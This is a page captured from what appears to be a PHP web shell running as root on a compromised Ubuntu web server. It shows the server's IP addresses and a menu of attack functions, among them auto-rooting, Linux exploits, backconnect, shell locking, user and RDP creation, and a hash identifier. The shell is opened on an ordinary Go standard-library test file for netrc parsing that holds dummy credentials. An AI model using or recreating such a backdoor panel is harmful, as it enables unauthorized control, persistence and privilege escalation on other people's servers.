Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
go /
src /
cmd /
go /
internal /
auth /
[ HOME SHELL ]
Name
Size
Permission
Action
auth.go
708
B
-rw-r--r--
netrc.go
2.31
KB
-rw-r--r--
netrc_test.go
1.04
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : netrc_test.go
// Copyright 2018 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package auth import ( "reflect" "testing" ) var testNetrc = ` machine incomplete password none machine api.github.com login user password pwd machine incomlete.host login justlogin machine test.host login user2 password pwd2 machine oneline login user3 password pwd3 machine ignore.host macdef ignore login nobody password nothing machine hasmacro.too macdef ignore-next-lines login user4 password pwd4 login nobody password nothing default login anonymous password gopher@golang.org machine after.default login oops password too-late-in-file ` func TestParseNetrc(t *testing.T) { lines := parseNetrc(testNetrc) want := []netrcLine{ {"api.github.com", "user", "pwd"}, {"test.host", "user2", "pwd2"}, {"oneline", "user3", "pwd3"}, {"hasmacro.too", "user4", "pwd4"}, } if !reflect.DeepEqual(lines, want) { t.Errorf("parseNetrc:\nhave %q\nwant %q", lines, want) } }
Close